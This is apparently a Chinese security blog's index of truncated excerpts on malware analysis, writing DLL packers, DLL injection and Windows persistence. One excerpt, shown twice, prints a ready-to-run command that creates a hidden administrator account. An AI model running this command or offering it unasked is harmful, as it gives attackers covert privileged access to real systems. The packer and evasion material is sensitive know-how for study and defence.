概述该样本是来自于VirusShare网站提供，于2022年3月15日在VirusTotal上被首次提交。拿到样本时只有一个dll文件，查看其资源节，发现有“XHtmlTreeTest.exe”等字符串信息，经网上...

前言前段时间自己学习了一下壳的编写，发现网上相关资料不是非常全，而且讲解顺序不太对胃口。因此参考了《黑客免杀攻防》中的代码对DLL型壳编写的结构进行了一次归纳整理，并附...

前言dll 注入技术是让某个进程主动加载指定的 dll 的技术。恶意软件为了提高隐蔽性，通常会使用 dll 注入技术将自身的恶意代码以 dll 的形式注入高可信进程。常规的 dll 注入...

0x1 匿名用户net user administrator$ woaijiushi /add && net localgroup administrators administrator$ /add PS：通过在用户后面添加$符号的形式将用户达到隐藏的效果。可...

0x1 匿名用户net user administrator$ woaijiushi /add && net localgroup administrators administrator$ /add PS：通过在用户后面添加$符号的形式将用户达到隐藏的效果。可...